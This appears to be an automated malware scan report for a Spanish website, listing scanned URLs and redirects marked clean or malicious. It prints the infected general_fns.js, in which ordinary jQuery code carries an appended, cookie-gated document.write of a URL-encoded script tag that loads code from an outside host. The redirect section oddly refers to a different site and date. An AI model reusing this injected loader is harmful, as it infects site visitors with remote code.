Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--montaadealicante-bub.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: resume-cv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 20:45:08 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.7a mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: resume-cv.com
Referer: http://www.google.com/search?q=resume-cv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://xn--montaadealicante-bub.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:14 GMT Location: http://www.xn--montaadealicante-bub.com/ Server: Microsoft-IIS/7.0 Content-Length: 250 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/ | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:14 GMT Location: http://www.muntanyadalacant.com/ Server: Microsoft-IIS/7.0 Content-Length: 155 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/ | 200 OK Content-Length: 12982 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/js/jquery-1.12.js | 200 OK Content-Length: 20976 Content-Type: text/javascript | clean |
http://xn--montaadealicante-bub.com/js/jquery.tabs.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:17 GMT Location: http://www.xn--montaadealicante-bub.com/js/jquery.tabs.js Server: Microsoft-IIS/7.0 Content-Length: 267 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/js/jquery.tabs.js | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:17 GMT Location: http://www.muntanyadalacant.com/js/jquery.tabs.js Server: Microsoft-IIS/7.0 Content-Length: 172 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/js/jquery.tabs.js | 200 OK Content-Length: 2747 Content-Type: text/javascript | clean |
http://xn--montaadealicante-bub.com/js/general_fns.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:18 GMT Location: http://www.xn--montaadealicante-bub.com/js/general_fns.js Server: Microsoft-IIS/7.0 Content-Length: 267 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/js/general_fns.js | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:18 GMT Location: http://www.muntanyadalacant.com/js/general_fns.js Server: Microsoft-IIS/7.0 Content-Length: 172 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/js/general_fns.js | 200 OK Content-Length: 5440 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
$(document).ready(function() { $('#container-1').tabs({fxFade: true, fxSpeed: 'fast'}); $('#container-2').tabs({fxFade: true, fxSpeed: 'fast'}); $("#termino").click(function(){ $("#termino").attr("value",""); }); $("a[@rel='external']").click(function(){this.target = "_blank";}); }); function embedFlash(ubicacion,pelicula,ancho,alto){ document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macro if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));}
Antivirus reports:
http://xn--montaadealicante-bub.com/index.php?idioma=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 15:29:18 GMT Location: http://www.xn--montaadealicante-bub.com/index.php?idioma=1 Server: Microsoft-IIS/7.0 Content-Length: 268 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.xn--montaadealicante-bub.com/index.php?idioma=1 | HTTP/1.1 301 Moved Permanently Date: Sat, 13 Dec 2014 15:29:19 GMT Location: http://www.muntanyadalacant.com/index.php Server: Microsoft-IIS/7.0 Content-Length: 164 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | malicious |
http://www.muntanyadalacant.com/index.php | 200 OK Content-Length: 12996 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/index.php?idioma=1 | 200 OK Content-Length: 13004 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/index.php?idioma=2 | 200 OK Content-Length: 12122 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/index.php?idioma=3 | 200 OK Content-Length: 12028 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php | 200 OK Content-Length: 10095 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php?idioma=1 | 200 OK Content-Length: 10095 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php?idioma=2 | 200 OK Content-Length: 10095 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/asociados.php?idioma=3 | 200 OK Content-Length: 9925 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/noticias.php | 200 OK Content-Length: 10837 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/noticias.php?idioma=1 | 200 OK Content-Length: 10967 Content-Type: text/html | clean |
http://www.muntanyadalacant.com/noticias.php?idioma=2 | 200 OK Content-Length: 10057 Content-Type: text/html | clean |